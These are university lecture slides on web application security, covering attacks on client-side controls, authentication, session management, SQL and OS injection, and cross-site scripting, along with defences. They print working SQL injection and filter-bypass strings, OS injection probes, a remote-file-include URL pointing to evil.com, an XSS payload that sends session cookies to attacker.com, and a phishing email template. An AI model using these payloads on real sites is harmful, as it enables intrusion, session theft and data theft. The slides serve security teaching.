Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 48
Network Security
Van K Nguyen - HUT

Web application security


Agenda

◼ Web application (in)security


◼ From hacker’s point of view
◼ Common Attack: Code injection
◼ Common Attack: Cross-site scripting

Material in this 2-session lecture is based on this book: “The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto [Wiley (October 22, 2007)] – below we refer to it as the WebHackerHandbook
Web application security

◼ The evolution of Web applications


All kinds of things we could do online
❑ Shopping (Amazon)
❑ Social networking (FaceBook, MySpace)

❑ Banking (Citibank)

❑ Web search (Google)

❑ Auctions (eBay)

❑ Gambling

❑ Web mail (Gmail, YahooMail, Hotmail)

❑ Interactive information (Wikipedia)

… The list can go on for as long as one bothers to add

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 5
Web application security
◼ Why security problems:
❑ New technologies ➔ introduced new possibilities for
exploitation
◼ the most significant battleground between attackers and
people/organization with computer resources and data to defend
❑ False perception of security
◼ “This site is secure”
“This site is absolutely secure. It has been designed to use 128-bit Secure
Socket Layer (SSL) technology to prevent unauthorized users from viewing
any of your information. You may use this site with peace of mind that your
data is safe with us.”
◼ Users are urged to trust the sites’ security just because of their use of
certificates, SSL/TLS (cryptographic tools) …
◼ In fact, the majority of web applications are insecure, and in ways
that have nothing to do with SSL/TLS.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Web application security

◼ SSL/TLS is important but


absolutely not everything
we need for security
❑ SSL is for confidentiality
and integrity of transmitted
data; it is just like a
construction block not the
full house
❑ SLL do nothing to prevent Some common web vulnerabilities found in
against these sample of 100+ sites -- WebHackerHandbook
vulnerabilities mentioned

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 7
The Core Security Problem:
Users Can Submit Arbitrary Input
◼ Users can interfere with any piece of data
transmitted between the client and the server
❑ request parameters, cookies, and HTTP headers
◼ Users can send requests and submit parameters in patterns different from what the application developers expect
◼ Users are not restricted to using only a web browser
to access the application.
❑ There are numerous widely available tools that operate
alongside, or independently of, a browser, to help attack
web applications.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 8
Examples of cheating
◼ Cheating is mainly based on sending input to the server which is
crafted to cause some event that was not expected or desired by
the application’s designer:
❑ Changing the price of a product transmitted in a hidden HTML form field ➔ purchase the product at a cheaper price
❑ Modifying a session token transmitted in an HTTP cookie ➔ hijack
the session of another authenticated user.
❑ Removing certain parameters that are normally submitted ➔ exploit
a logic flaw in the application’s processing.
❑ Altering some input that will be processed by a back-end database
➔ inject a malicious database query ➔ obtain sensitive data
◼ Can SSL help?
❑ Absolutely Not! SSL does nothing to stop an attacker from
submitting crafted input to the server.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology
SSL can’t stop hacker creating
malicious input

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 10
Critical Factors leading to this insecurity

◼ Immature Security Awareness


◼ In-House Development
◼ Deceptive Simplicity
❑ With today’s web dev. tech., even a novice programmer can build a powerful app from scratch in a short time.
❑ But there is a HUGE difference between producing code that is functional and code that is secure
◼ Rapidly Evolving Threat Profile
◼ Resource and Time Constraints
◼ Overextended Technologies

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 11
Core Defense Mechanisms
The defense mechanisms employed by web applications comprise
the following core elements:
◼ Handling user access to the application’s data and functionality
➔ prevent users from gaining unauthorized access.
◼ Handling user input to the application’s functions ➔ prevent
malformed input from causing undesirable behavior.
◼ Handling attackers ➔ the application behaves appropriately
when being directly targeted
❑ Using suitable defensive measures to frustrate the attacker

◼ Managing the application itself


❑ Enabling administrators to monitor its activities and configure its
functionality.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 12
Hacker’s handbook: Mapping the
application
◼ Mapping the application: The first step in attacking an application
❑ to gather and examine some key information ➔ gain a better
understanding of what you are up against.
◼ Enumerating the application’s content and functionality➔
understand what it actually does and how it behaves.
❑ Much of this functionality will be easy to identify, but some may
be hidden away➔ need some guesswork and luck to discover.
◼ Once obtaining a catalogue of the application’s functionality ➔
closely examine every aspect of application behavior/core
security mechanisms, and the technologies being employed.
❑ ➔ Attackers can identify the key attack surface that the
application exposes: the most interesting areas to target ➔
further subsequent probing to find exploitable vulnerabilities

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 13
Mapping the application: the steps
◼ Enumerating Content and Functionality
❑ Web Spidering
❑ User-Directed Spidering
❑ Discovering Hidden Content
◼ Brute-Force Techniques
◼ Inference from Published Content
◼ Use of Public Information
◼ Leveraging the Web Server
❑ Application Pages vs. Functional Paths
❑ Discovering Hidden Parameters
◼ Analyzing the Application
❑ Identifying Entry Points for User Input
❑ Identifying Server-Side Technologies
◼ Banner Grabbing
◼ HTTP Fingerprinting
◼ File Extensions
◼ Directory Names
◼ Session Tokens
◼ Third-Party Code Components
❑ Identifying Server-Side Functionality
◼ Dissecting Requests
◼ Extrapolating Application Behavior
❑ Mapping the Attack Surface

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 14
HACKER HANDBOOK:
BYPASSING CLIENT-SIDE
CONTROLS

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 15
Hacker Handbook: Bypassing Client-Side
Controls
◼ The core security problem with web applications: clients can submit
arbitrary input
❑ Often web applications rely upon various kinds of measures
implemented on the client side to control the data to be submitted
◼ A fundamental security flaw: the user has full control over the client
and submitted data ➔ can bypass controls implemented on the client
◼ Two major ways in which client-side controls are used to restrict user
input
❑ An app may transmit data via the client component, using some
mechanism that is supposed to prevent user’s modifying data
❑ On gathering data entered by the user, an app may use client-side
controls which handle the contents of that data to be submitted
◼ using HTML form features, client-side scripts, or thick-client technologies.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 16
Bypassing Client-Side Controls
◼ False expectation and assumption
❑ “It is very common to see an application passing data to the client
in a form that is not directly visible or modifiable by the end user,
in the expectation that this data will be sent back to the server in
a subsequent request. Often, the application’s developers simply
assume that the transmission mechanism used will ensure that
the data transmitted via the client will not be modified along the
way.” – WebHackerHandbook
❑ the assumption that data transmitted via the client will not be
modified is FALSE!
◼ Why such a flawed practice happens so often:
❑ Convenience: it is easy for web developers to do
❑ Echoing known facts back to the server reduces the per-session state stored at the server ➔ better performance
◼ It also helps when deploying a load-balanced cluster of servers

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 17
By-passing: Hidden Form Fields
◼ If a field is flagged as hidden, it is not displayed on-screen.
❑ However, the field’s name and value are stored within the form and sent back to the application when the user submits the form.
◼ The code behind this form is as follows:
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>
◼ But you can easily modify this hidden field!
❑ Simply save the source code for the HTML page, edit the value of the field, reload the source into a browser, and click the Buy button.
◼ Modify the hidden price and you can buy at a cheaper price!
◼ Better still, use an intercepting proxy to modify the desired data on the fly.
❑ Burp Proxy (part of Burp Suite)
❑ WebScarab
❑ Paros
◼ The proxy is placed between your web browser and the target application
❑ It can intercept every request issued to the application, and every response received back, for both HTTP and HTTPS

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 18
Capturing User Data: HTML Form

◼ Forms can be used to impose restrictions i.e.


perform validation checks on the user-supplied
data.
➔ these client-side controls are used as a security
mechanism to defend itself against malicious input,

◼ However, the controls can usually be trivially


circumvented ➔ leaving the application
potentially vulnerable to attack.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 19
Length limits
◼ E.g. the browser prevents the user from entering more than 3 digits in the quantity field ➔ the server side may assume that the quantity parameter is always < 1000
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” maxlength=”3” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>

◼ But a malicious user can easily defeat this and then take advantage of it
❑ Submit data that is longer than this length but that is still valid in other
respects ➔ If the application accepts the overlong data➔ infer that
the length limit validation is not replicated on the server.
❑ Hacker may be able to leverage the defects in validation to exploit
SQL injection, cross-site scripting, or buffer overflows
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 20
Hacker Handbook: Bypassing Client-Side
Controls
◼ Transmitting Data via the Client
❑ Hidden Form Fields
❑ HTTP Cookies
❑ URL Parameters
❑ The Referer Header
❑ Opaque Data
❑ The ASP.NET ViewState
◼ Capturing User Data: HTML Forms
❑ Length Limits
❑ Script-Based Validation
❑ Disabled Elements
◼ Capturing User Data: Thick-Client Components
❑ Java Applets
❑ Decompiling Java Bytecode
❑ Coping with Bytecode Obfuscation
❑ ActiveX Controls
◼ Reverse Engineering
◼ Manipulating Exported Functions
◼ Fixing Inputs Processed by Controls
◼ Decompiling Managed Code
❑ Shockwave Flash Objects
◼ Handling Client-Side Data Securely
❑ Transmitting Data via the Client
❑ Validating Client-Generated Data
❑ Logging and Alerting

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 21
Capturing User Data: Thick-Client
Components
◼ Another way for capturing, validating, and
submitting user data
❑ The technologies most likely to encounter: Java
applets, ActiveX controls, and Shockwave Flash
objects

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 22
Java applets
◼ the applet tag instructs the browser to load a Java applet from the specified URL and instantiate it with the name TheApplet
◼ when the user clicks the Play button, a JavaScript routine executes that invokes the getScore method of the applet
◼ this is when the actual game play takes place, after which the score is displayed in an alert dialog
◼ the script then invokes the getObsScore method of the applet, and submits the returned value as a parameter to the submitScore.jsp URL, together with the name entered by the user
<script>
function play()
{
alert(“you scored “ + TheApplet.getScore());
document.location = “submitScore.jsp?score=” + TheApplet.getObsScore() + “&name=” + document.playForm.yourName.value;
}
</script>
<form name=playForm>
<p>Enter name: <input type=”text” name=”yourName” value=”“></p>
<input type=”button” value=”Play” onclick=JavaScript:play()>
</form>
<applet code=”https://wahh-game.com/JavaGame.class” id=”TheApplet”></applet>

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 23
Obfuscation & decompiling
◼ Example: playing the game results in a dialog like
this, then followed by a request for a URL with this
form:
❑ https://wahh-game.com/submitScore.jsp?score=
c1cc3139323c3e4544464d51515352585a61606a6b&name
=daf
◼ Obfuscation:
◼ The long string that is returned by the getObsScore method, and
submitted in the score parameter.
◼ Want to cheat the game and submit an arbitrarily high score? ➔ you need to know how to correctly obfuscate your chosen score, i.e. so that it is decoded the intended way by the server. ➔ Reverse engineering is possible but difficult!
◼ Decompiling Java bytecode: decompile the applet to obtain its source
code. Java bytecode can be decompiled to recover its original source code

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 24
Handling Client-Side Data Securely
◼ The core security problem with web applications arises because client-
side components and user input are outside of the server’s direct
control.
❑ The client, and all of the data received from it, is inherently untrustworthy.
◼ Transmitting Data via the Client
❑ Applications should avoid transmitting critical data (e.g. product prices and discount rates) via the client
❑ Often, it is possible to hold such data on the server, and reference it directly from server-side logic (see the sketch after this list)
◼ Validating Client-Generated Data: data generated on the client and transmitted to the server cannot, in principle, be validated securely on the client
❑ Lightweight controls like HTML form fields and JavaScript can be trivially circumvented
❑ Thick-client components merely slow down an attacker for a short period
❑ Obfuscated client-side code provides additional obstacles, but can still be overcome by a determined attacker
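A minimal server-side sketch of these points (illustrative names; the essence is that the price comes from the server's own catalogue and the quantity is re-validated on the server, regardless of any client-side checks):

# Server-side sketch: never trust a client-supplied price; re-validate input.
CATALOGUE = {"A217S": 1224.95}            # authoritative prices live server-side

def place_order(product_id: str, quantity_raw: str) -> float:
    try:
        quantity = int(quantity_raw)      # client-side maxlength means nothing here
    except ValueError:
        raise ValueError("quantity must be an integer")
    if not (1 <= quantity <= 999):
        raise ValueError("quantity out of range")
    if product_id not in CATALOGUE:
        raise ValueError("unknown product")
    return CATALOGUE[product_id] * quantity   # price referenced from server logic

print(place_order("A217S", "3"))          # 3674.85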

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 25
HACKER HANDBOOK:
ATTACKING
AUTHENTICATION

26
Attacking Authentication

◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 27
Design flaws
◼ Poorly chosen passwords
❑ Attack: discover password policies by trying to register several accounts and then changing passwords
❑ Brute-forcible login
◼ the allowed number of login attempts can be found in cookies
◼ Poorly chosen usernames
❑ Could be email addresses, or other easily guessable values
◼ Verbose Failure Messages
❑ Can be used to guess usernames: different messages depending on whether the username or the password is invalid (the difference might be small)
❑ Another factor is a difference in timing (delay in the response from the server)
➔ Hack steps:
❑ Monitor your own login session with tools such as Wireshark or a web proxy
◼ Generate a list of (username, password) pairs, then automate a brute-force attack
❑ If the login form is loaded using http ➔ vulnerable to a man-in-the-middle attack
◼ even if the authentication itself is protected by HTTPS
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 28
Design flaws
◼ “Forgotten password” functionality
❑ Often not well tested
❑ Secondary challenges are much easier to guess
◼ User-set secret question/Password hints set by user:
usually easy ones, could be trivial
◼ Authentication information sent to an email address
specified in password recovery procedure
◼ “Remember me” functionality
❑ Insecure implementation
◼ E.g. RememberUser=“PeterGell”
◼ Simple persistent cookie
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 29
Design flaws
◼ User impersonation functionality
❑ Used by system to allow administrator to impersonate normal
users
❑ Could be implemented as a “hidden” function such as
/admin/ImpersonateUser.php
❑ Could trust user controllable data such as a cookie
◼ Non-unique user names (rare but observed in
the wild)
❑ Application might or might not enforce different passwords
❑ Hack steps: register multiple names with the same user name
with different passwords
❑ Monitor for behavior differences when the password is already
used
❑ This allows attacks on frequent usernames

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 30
Attacking Authentication

◼ Predictable Initial Password


❑ Commonly known passwords:
◼ Common practice in schools is to use the student id numbers
❑ Hack steps: Try to obtain several passwords in quick
succession to see whether they change in a predictable
way
◼ Insecure Distribution of Credentials
❑ Typically distributed out of band such as email
❑ If there is no requirement to change passwords➔ capturing
messages / message archives yields valid credentials

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 31
Attacking Authentication

◼ Logic flaws in multistage login mechanisms


❑ Mechanisms provide additional security by adding
additional checks
❑ Logic flaws are simpler to make: attack the logics of
control flow and data consistence between stages
◼ Hacking steps:
❑ Monitor successful login
❑ Identify distinct stages and the data requested
❑ Repeat the login process with various malformed requests
❑ Check whether all demanded information is actually processed
❑ Check for client-side data that might reflect successful passing
through a stage

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 32
Attacking Authentication

◼ Insecure Storage of Credentials


❑ Often stored in unsecured form in a database
❑ Targets of sql injection attacks or authentication
weaknesses

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 33
ATTACKING SESSION
MANAGEMENT

34
Session Management

◼ The session management mechanism is a fundamental


security component in the majority of web applications,
which enables the application
❑ to uniquely identify a given user across a number of different requests
❑ to handle the data that it accumulates about the state of that user’s
interaction with the application.
◼ If an attacker can break an application’s session
management
❑ she can effectively bypass its authentication controls
❑ masquerade as other users without knowing their credentials.

If an attacker compromises an administrative user in this way, then the


attacker can own the entire application.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 35
Why Session
◼ Why session
❑ Users do not want to have to reenter their password on every single
page of the application
◼ Implementing sessions
❑ Issue each user with a unique session token or identifier
❑ On each subsequent request to the application, the user resubmits this
token, enabling the application to determine which sequence of earlier
requests the current request relates to.
❑ HTTP cookies as the mechanism for passing these session tokens between
server and client
◼ E.g. the server’s first response to a new client contains an HTTP header
Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
◼ and subsequent requests from the client contain the header:
Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 36
Session Management and Weakness
◼ Sessions need to store state
◼ Performance dictates to store state at client
❑ Cookies
❑ Hidden forms
◼ Asp.net view state (Not a session)
❑ Fat URL
❑ HTTP authentication (Not a session)
❑ All or combinations, which might vary within a different state
◼ Weaknesses usually come from
❑ Weak generation of session tokens
❑ Weak handling of session tokens
◼ Hacker needs to find used session token
❑ Find session dependent states and disfigure token
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 37
Weaknesses in Session Token Generation
◼ Meaningful tokens
❑ Might be encoded in hex, base-64, …
❑ Might be trivially encrypted (e.g. with XOR encryption)
❑ Leak session data information
❑ If not cryptographically protected by a signature, allow simple
alteration
◼ Hacking Steps:
❑ Obtain a single token and systematically alter it, observing the effect
on the interaction with the website
❑ Log-in as several users, at different times, … to record and analyze
differences in tokens
❑ Analyze tokens for correlation related to state information such as
user names
❑ Test reverse engineering results by accessing site with artificially
created tokens.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 38
Predictable tokens

◼ Most brazen weakness: sequential session ids


◼ Typical weaknesses:
❑ Concealed sequences
◼ Such as adding a constant to the previous value
❑ Time dependencies
◼ Such as using Unix, Windows NT time
❑ Weak random number generation
◼ E.g. Use NIST FIPS-140-2 statistical tests to discover
◼ Use hacker tools such as Stompy

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 39
Weaknesses in Session Token Handling

◼ Disclosure of Tokens on the Network


❑ not all interactions are protected by HTTPS
◼ Common scenario: Login, account update uses https, the rest or part
(help pages) of the site not.
◼ Use of http for pre-authenticated areas of the site such as front page,
which might issue a token
❑ Cookies can be protected by the “secure” flag
◼ Disclosure of Tokens in
❑ Logs of User browser/Web server/corporate or ISP proxy
servers/reverse proxies
❑ Referer logs of any servers that user visit by following off-site links
◼ Example: Firefox 2.? Includes referer header provided that the off-site is
also https. This exposes data in URLs

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 40
Weaknesses in Session Token Handling

◼ Multiple valid tokens concurrently assigned to the same


user / session
❑ Existence of multiple tokens is an indication for a security breach
◼ Of course, user could have abandoned and restarted a session

◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature

◼ Other logic defects:


❑ A token consisting of a user name, a good randomized string that
never used / verified the random part, …

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 41
Weaknesses in Session Token Handling

◼ Client exposure to Token Hijacking


❑ XSS attacks query routinely user’s cookies
❑ Session Hijacking:
◼ Session Fixation Vulnerability:
❑ Attacker feeds token to the user, waits for them to login, then
hijacks the session
◼ Cross-Site Request Forgeries
❑ Attacker crafts request to application
❑ Incites user to send request
❑ Relies on token being sent to site

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 42
Securing Session Management

◼ Generate Strong Tokens


❑ Uses cryptography
❑ Uses a cryptographically strong random number generator (see the sketch after this list)
◼ Protect Tokens throughout their Lifecycle
❑ Transmit tokens only over https
❑ Do not use URL to transmit session tokens
❑ Implement logout functionality
❑ Implement session expiration
❑ Prevent concurrent logins
❑ Beware of / secure administrative functionality to view
session tokens
❑ Beware of errors in setting cookie domains and paths
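A minimal sketch of the first point using Python's standard-library CSPRNG (in practice the framework's built-in session handling is usually preferable to rolling your own):

# Sketch: generate an unpredictable session token from a cryptographically
# strong random source (never from time, counters, or user data).
import secrets

def new_session_token() -> str:
    return secrets.token_urlsafe(32)      # 32 random bytes, URL-safe encoding

print(new_session_token())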
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 43
Securing Session Management
◼ Prevent Cross-Site Scripting vulnerabilities
◼ Check tokens submitted
◼ If warranted, require two-step confirmation and / or
reauthentication to limit effects of cross-site request forgeries
❑ Consider per-page tokens

◼ Create a fresh session after successful authentication to limit


effects of session fixation attacks
❑ This is particularly difficult, if sensitive information is submitted,
but user does not authenticate
◼ Log, Monitor, Alert
◼ Implement reactive session termination

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 44
CODE INJECTION

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 45
Code Injection

◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1=1 --
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual query:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
◼ Forge the query by injecting the input below (see the sketch after this slide):
Wiley’ UNION SELECT username, password, uid FROM users--
That is, the application ends up building
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’ UNION SELECT username, password, uid FROM users--’

◼ Should look at error messages in order to


reformulate the string more successfully
❑ ‘ UNION SELECT NULL--
❑ ‘ UNION SELECT NULL, NULL--
❑ ‘UNION SELECT NULL, NULL, NULL --
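To see where the UNION payload above ends up, here is a sketch of the kind of vulnerable string concatenation that makes it work (illustrative code, not taken from the handbook):

# Sketch of vulnerable query building: the publisher value is concatenated
# straight into the SQL text, so a crafted value rewrites the query.
def build_query(publisher: str) -> str:
    return ("SELECT author, title, year FROM books "
            "WHERE publisher = '" + publisher + "'")

print(build_query("Wiley"))
print(build_query("Wiley' UNION SELECT username, password, uid FROM users--"))
# The second call yields the injected query from the slide:
# SELECT author, title, year FROM books WHERE publisher = 'Wiley' UNION SELECT username, password, uid FROM users--'

A parameterized query, which passes the publisher value as data through a placeholder instead of concatenating it into the SQL text, would defeat this.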
Union operator

◼ Find out how many rows are in the table:


❑ ORDER BY 1 --
❑ ORDER BY 2 --
❑ ORDER BY 3 –
◼ Find out which columns have the string data
type
❑ UNION SELECT ‘a’, NULL, NULL--
❑ UNION SELECT NULL, ‘a’, NULL--
❑ UNION SELECT NULL, NULL, ‘a’--
Fingerprinting the database
◼ Why fingerprinting:
❑ Important because of differences in SQL supported
◼ E.g.: Oracle SQL requires a from clause in all selects
◼ How
❑ Obtain version string of database from
◼ UNION SELECT banner,NULL,NULL from v$version
❑ Try different ways of concatenation
◼ Oracle: ‘Tho’||’mas’
◼ MS-SQL: ‘Tho’+’mas’
◼ MySQL: ‘Tho’ ‘mas’ (with space between quotes)
❑ Different numbering formats
◼ Oracle: BITAND(1,1)-BITAND(1,1)
◼ MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED
◼ MySQL: CONNECTION_ID() - CONNECTION_ID()
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
‘ having 1=1 –
❑ Generates error message

◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)


[ODBC SQL Server Driver] [SQL Server] Column ‘users.ID’ is invalid in the
select list because it is not contained in an aggregate function and there is no
GROUP BY clause

◼ Inject
‘ group by users.ID having 1=1 –
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ No proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters

◼ Avoiding blocked characters


❑ The single quotation mark is not required for
injecting into a numeric data field
❑ If the comment character is blocked, craft injection
so that it does not break the surrounding query
◼ ‘ or 1 = 1 -- ➔ ‘ or ‘a’ = ‘ a
❑ MS-SQL does not need semicolons to separate
several commands in a batch
By-passing filters
◼ Circumventing simple validation
❑ If a simple blacklist is used, attack canonicalization and validation.
❑ E.g. instead of select, try
◼ SeLeCt
◼ SELSELECTECT
◼ %53%45%4c%45%43%54
◼ %2553%2545%254c%2545%2543%2554

◼ Use inline comments


❑ SEL/*foo*/ECT (valid in MySQL)
◼ Manipulate blocked strings
❑ ‘adm’| |’in’ (valid in Oracle)
◼ Use dynamic execution
❑ exec(‘select * from users’) works in MS-SQL
By-passing filters
◼ Exploit defective filters
❑ Example: Site defends by escaping any single
quotation mark
◼ I.e.: Replace ‘ with ‘’
❑ Assume that user field is limited to 20 characters
◼ Inject
❑ aaaaaaaaaaaaaaaaaaa’
◼ Application replaces this with
❑ aaaaaaaaaaaaaaaaaaa’’
◼ Passes it on to database, which shortens it to 20
characters, removing the final single quotation mark
◼ Therefore, inject
❑ aaaaaaaaaaaaaaaaaaa’ or 1=1 --
Second Order SQL Injection

◼ The result of an SQL statement is posted in


another sql statement
❑ Canonicalization is now much more difficult
Code Injection: OS Injection

◼ Two types:
❑ Characters ; | & and newline are used to batch multiple commands
❑ The backtick character ` is used to encapsulate a separate command within a data item
◼ Use time-delay tests
❑ Use ‘ping’ to the loop-back device
◼ || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
❑ works for both Windows and Linux in the absence of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of the echoed number or an error message (see the sketch below)
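A sketch of why the echo probes above work: when user input is concatenated into a shell command, the injected separator starts a second command (illustrative code showing the vulnerable pattern; never build commands this way):

# Vulnerable pattern sketch: user input concatenated into a shell command.
import subprocess

def lookup(host: str) -> str:
    # BAD: shell=True plus concatenation lets ";", "|", "&", "`" inject commands.
    return subprocess.run("nslookup " + host, shell=True,
                          capture_output=True, text=True).stdout

# A benign probe like the slides suggest (on a POSIX shell):
print(lookup("example.com; echo 11111111"))   # output ends with 11111111
# Safer: subprocess.run(["nslookup", host], capture_output=True, text=True)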
OS Injection

◼ Remote file injection


❑ PHP include accepts a remote file path
◼ Example Fault:
https://bobadilla.engr.scu.edu/main.php?Country=FRG
is processed as
❑ $country = $_GET[‘Country’];
❑ include( $country. ‘.php’ );
❑ which loads file: FRG.php
❑ Attacker injects
▪ https://bobadilla.engr.scu.edu/main.php?Country=http://evil.co
m/backdoor
◼ Found by putting attacker’s resources, or non-
existing IP, or static resource on victim’s site, …
Code Injection: OS Injection

◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS

◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)

Network Security by Van K Nguyen 63


Sep 2010 Hanoi University of Technology 63
Reflected XSS
◼ User-input is reflected to web page
❑ Common vulnerability is reflection of input for an
error message
◼ Exploitation: the attacker hijacks the user’s session
[Figure: reflected XSS sequence: the user logs in; the attacker feeds the user a crafted URL; the user requests the attacker’s URL; the server responds with the attacker’s JavaScript; the user’s browser sends the session token to the attacker]
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var i = new Image; i.src=“http://attacker.com/”+document.cookie
6. The code causes the user’s browser to make a request to attacker.com which contains the current session token
7. The attacker monitors requests to attacker.com and captures the token in order to be able to perform arbitrary actions as the user (a minimal sketch of such a vulnerable page follows)
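A minimal sketch of the kind of vulnerable page behind steps 3-5, written with Flask for brevity (an assumption for illustration; the error.php page in the example would behave analogously):

# Reflected XSS sketch: the "message" parameter is echoed into the page
# without encoding, so a <script> payload in the URL runs in the victim's
# browser within the site's origin.
from flask import Flask, request

app = Flask(__name__)

@app.route("/error")
def error():
    message = request.args.get("message", "")
    return "<html><body><p>" + message + "</p></body></html>"   # unsafe echo

# Fix: HTML-encode before echoing, e.g. markupsafe.escape(message).
if __name__ == "__main__":
    app.run()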
Reflected XSS

◼ Same Origin Policy: Cookies are only returned to the


site that set them.
❑ Same Origin Policy:
◼ Page residing in one domain can cause an arbitrary request to
be made to another domain.
◼ Page residing in one domain can load a script from another
domain and execute it in its own context
◼ A page residing in one domain cannot read or modify cookies
(or other DOM data) belonging to another domain
◼ For browser, the attacker’s javascript came from the
site
❑ It is executed within the context of the site
How to feed a tricky URL

From: Thomas Schwarz <tschwarz@bobadilla.engr.scu.edu>


To: John Doe
Subject: Complete online course feed-back form
Dear Valued Student
Please fill out the following online course feed-back form. Your grades
will not be released to the registrar without having completed this form.
Please go to my course website using your usual bookmark and then
click on the following link:
https://bobadilla.engr.scu.edu/%65%72%72%6f%72?message%3d%3c%
